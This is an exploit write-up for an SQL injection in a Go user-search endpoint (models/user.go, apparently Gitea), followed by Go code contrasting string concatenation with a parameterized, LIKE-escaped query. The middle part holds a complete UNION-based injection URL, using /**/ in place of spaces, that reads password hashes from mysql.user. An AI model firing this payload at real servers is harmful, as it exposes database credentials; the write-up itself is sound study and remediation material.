Exploit-README
We find the exploit in two files:
models/user.go and models/user.go
The vulnerable string is the following line in user.go, which builds the LIKE pattern by concatenating the user's keyword into the query text:

err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" + opt.Keyword + "%'").Find(&us)
This is the Golang MySQL statement, which can be simplified to:

select * from users where type=0 and lower_name like '%user_input%' limit opt.limit
The string passed as user_input must keep the original statement valid, so the first step is to close it in a way that returns zero rows.

... lower_name like '%' and false): here `' and false)` is the partial user input. The main statement still runs successfully but returns nothing, because any condition combined with `and false` gives 0 results.

To execute an arbitrary statement we cannot terminate the above statement with `;`, as the Go SQL call is not designed to accept multiple statements. We therefore need a way to run a second SQL statement together with the main one without separating them. For this we use the SQL `union` operator, which combines two separate statements into a single statement as long as both produce the same number of columns. If the second statement does not have the same number of columns, `null` can be added to stand in for a column.

Consequently, we now know how to execute another SQL statement together with the main one. To get around the space problem, we use multi-line comment syntax (`/**/`): it acts as a space and is not considered part of the statement.
We now create our exploit string which is as follows:
http://192.168.154.150/api/v1/users/search?q=%27/**/and/**/false)/**/union/**/select/**/null,null,Password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.user/**/where/**/(%27%25%27%3D%27
The above statement will print the password saved in the mysql.user database.
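The root cause above is string concatenation of `opt.Keyword` into the SQL text. The following is an added example (not Gitea's own code, and not the project's actual fix) that places that concatenation pattern beside a parameterized version, using only the Go standard library so it runs without a database. The function names, the `user` table name, the `ESCAPE '!'` convention and the sample keyword `o'brien` are assumptions made for the example; the point is that with placeholders the keyword is sent as data and can never alter the structure of the query, and that `%`/`_` still need escaping so a search term is matched literally.

```go
package main

import (
	"fmt"
	"strings"
)

// buildSearchUnsafe mirrors the vulnerable construction from the write-up:
// the keyword is spliced into the SQL text, so a quote in the keyword ends
// the string literal and whatever follows is parsed as SQL.
func buildSearchUnsafe(keyword string, limit int) string {
	return fmt.Sprintf(
		"SELECT * FROM user WHERE type=0 AND lower_name LIKE '%%%s%%' LIMIT %d",
		keyword, limit)
}

// escapeLike escapes LIKE metacharacters with '!' so a user-supplied keyword
// matches literally. '!' is a portable choice declared via ESCAPE in the query.
func escapeLike(s string) string {
	r := strings.NewReplacer("!", "!!", "%", "!%", "_", "!_")
	return r.Replace(s)
}

// buildSearchSafe returns SQL with '?' placeholders plus the bound arguments.
// The keyword never touches the SQL text; the driver transmits it as a value.
// Lower-casing mirrors the fact that the column being searched is lower_name.
func buildSearchSafe(keyword string, limit int) (string, []interface{}) {
	query := "SELECT * FROM user WHERE type=0 AND lower_name LIKE ? ESCAPE '!' LIMIT ?"
	args := []interface{}{"%" + escapeLike(strings.ToLower(keyword)) + "%", limit}
	return query, args
}

// breaksOut reports whether a keyword would change the structure of the
// concatenated query: any quote character terminates the string literal.
func breaksOut(keyword string) bool {
	return strings.ContainsAny(keyword, "'\"")
}

// quoteBalanced is a crude structural check: an odd number of single quotes
// in the final SQL text means a literal was broken open by the input.
func quoteBalanced(sql string) bool {
	return strings.Count(sql, "'")%2 == 0
}

func main() {
	keyword := "o'brien" // constructed sample input: a legitimate name with an apostrophe
	unsafe := buildSearchUnsafe(keyword, 10)
	fmt.Printf("concatenated: %s\n  quotes balanced: %v\n", unsafe, quoteBalanced(unsafe))
	q, args := buildSearchSafe(keyword, 10)
	fmt.Printf("parameterized: %s\n  args: %q\n  quotes balanced: %v\n", q, args, quoteBalanced(q))
}
```

Even the benign apostrophe in `o'brien` leaves the concatenated query with an unbalanced quote, which is exactly the property the write-up exploits; the parameterized query is unaffected because the keyword is carried in `args` rather than in the SQL string.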